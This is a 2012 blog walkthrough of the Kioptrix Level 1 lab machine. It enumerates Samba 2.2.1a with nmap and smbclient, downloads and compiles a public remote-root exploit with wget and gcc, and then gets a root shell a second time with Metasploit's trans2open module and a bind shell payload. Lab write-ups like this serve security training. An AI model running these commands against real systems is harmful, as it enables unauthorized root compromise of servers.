Sunday, 12 August 2012

Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA)


Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA)
Hi everyone, this is the second part of the level 1, now we are going to exploit samba. As you remember from the last video, we managed to get root using an SSL exploit for apache, now its time to exploit a samba vulnerabilities. So, lets start.
First, lets run an nmap
nmap -sV 172.16.1.144
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-07 11:12 BST
Nmap scan report for 172.16.1.144
Host is up (0.00068s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd (workgroup: MYGROUP)
MAC Address: 00:50:56:AF:5A:B9 (VMware)
Ok, this output doesn't tell the version of samba, but we can try two commands
to list the version :
1) smbclient -L 172.16.1.144
Result :
Enter root's password:
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
 Sharename       Type      Comment
 ---------       ----      -------
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error
ERRnosupport
 IPC$            IPC       IPC Service (Samba Server)
 ADMIN$          Disk      IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

2) smbclient //172.16.1.144/IPC$
Result:
Enter root's password:
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
tree connect failed: ERRnosuchshare
Ok, now we know its running version 2.2.1a, lets try to find an exploit for
it. If you google for "samba 2.2.1a" exploit
You will find this exploit
http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c
So.. lets go back to our backtrack , download and compile it.
wget http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c
gcc -o exploit 0x333hate.c
./exploit  -t 172.16.1.144
Result :
[~] 0x333hate => samba 2.2.x remote root exploit [~]
 [~]        coded by c0wboy ~ www.0x333.org       [~]
 [-] connecting to 172.16.1.144:139
 [-] stating bruteforce
 [-] testing 0xbfffffff
 [-] testing 0xbffffdff
 [-] testing 0xbffffbff
 [-] testing 0xbffff9ff
 [-] testing 0xbffff7ff
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)


There is another way to exploit this samba using metasploit. Lets try that.
msfconsole
search samba
use linux/samba/trans2open
show options
set RHOST 172.16.1.144
show payloads
set PAYLOAD linux/x86/shell/bind_tcp
show options
exploit
[*] Started bind handler
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to 172.16.1.144
[*] Trying return address 0xbffff9fc...
[*] Command shell session 1 opened (172.16.1.79:52832 -> 172.16.1.144:4444) at
2012-08-07 11:51:46 +0100
id
uid=0(root) gid=0(root) groups=99(nobody)


Success!! We got again on the box.

No comments:

Post a Comment